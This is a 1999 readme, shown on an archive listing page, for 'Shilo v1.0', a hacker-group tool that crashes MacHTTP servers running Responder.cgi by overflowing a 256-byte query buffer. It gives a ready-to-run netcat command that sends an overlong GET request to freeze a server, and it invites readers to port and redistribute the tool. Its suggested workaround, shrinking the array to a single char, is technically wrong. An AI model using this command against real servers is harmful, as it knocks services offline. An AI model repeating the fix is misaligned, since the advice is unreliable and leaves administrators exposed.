home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Attack⁄DoS / shilov1.0.sit / Shilo v1.0 / Read Me < prev    next >
Text File  |  1999-04-12  |  2KB  |  41 lines
  1.              ___________________________
  2.             /        /        /        /\
  3.      ______/    ____/    ____/        / /
  4.     /     /        /        /    ____/ /
  5.    /     /____    /    ____/        / / 
  6.   / / / /        /        /        / /
  7.  /_/_/_/________/________/________/ /
  8.  \_____\________\________\________\/
  9.  / . ../Macintosh  Security/.. .  /
  10. /________________________________/
  11.  
  12. Shilo v1.0
  13. Written by Epic <epic@msec.net>
  14. A Member of the undisputed mSec Family
  15. [http://www.msec.net]  [hotline://msec.net]
  16.  
  17. Shilo exploits a bug in Responder.cgi, a public domain 'C' shell for MacHTTP CGI Servers which contains a buffer overflow that when exploited, will cause the server it is run on to freeze. You are at risk if your responder.cgi file contains the line of code:
  18.  
  19. char PostArg_Search[256];
  20.  
  21. which is the QUERY_STRING, Since it only allows upto 256 characters after ?, the server will crash if 257+ characters are requested.
  22.  
  23. Exploit Example: (nc is netcat from avian.org)
  24. $ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  25. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  26. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  27. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80
  28.  
  29. Possible Workaround:
  30. Remove responder.cgi from your /cgi-bin/ or change
  31. char PostArg_Search[256]; to
  32. char PostArg_Search;
  33.  
  34. Shilo is a simple "hack" written in REALbasic and the source code is available for you to experiment with. I strongly encourage you to attempt to port Shilo to other languages and or other platforms, however, if you do modify the source in any way and re-release to the general public you must
  35. 1) Inform me of the New Version "Clone"
  36. 2) Include the Source code to the new "Clone"
  37. 3) Send me the "Clone" version
  38.  
  39. Special thanks to the mSec family and all the other gilrs and boys out there keepin' it real on the macintosh scene
  40.  
  41. -Epic